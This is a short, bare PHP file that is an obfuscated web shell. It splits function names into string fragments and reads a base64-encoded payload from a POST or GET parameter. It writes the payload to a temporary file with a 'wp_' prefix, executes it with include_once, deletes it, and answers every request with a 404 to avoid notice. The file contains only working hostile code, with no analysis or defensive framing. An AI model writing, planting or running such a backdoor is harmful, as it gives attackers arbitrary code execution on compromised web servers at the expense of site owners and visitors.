<?php
try{
$tc2edf[]='sys_get'.'_temp_dir';
$tc2edf[]='base64'.'_decode';
$tc2edf[]='tempn'.'am';
$tc2edf[]='array_key_exi'.'sts';
$tc2edf[]='file_'.'put_contents';
$tc2edf[]='unl'.'ink';
$u2bb7a='a164'.'189d';
if($tc2edf[3]($u2bb7a,$_POST)){
$yad9ad=$tc2edf[1]($_POST[$u2bb7a]);
}elseif($tc2edf[3]($u2bb7a,$_GET)){
$yad9ad=$tc2edf[1]($_GET[$u2bb7a]);
}else{$yad9ad=null;}
if($yad9ad){
$ha6471=$tc2edf[2]($tc2edf[0](),'w'.'p_');
if($ha6471){
$tc2edf[4]($ha6471,'<'.'?ph'.'p '.$yad9ad);
http_response_code(404);
@include_once($ha6471);
@$tc2edf[5]($ha6471);
}}
http_response_code(404);
}catch(Throwable $e){http_response_code(404);}catch(Exception $e){http_response_code(404);}
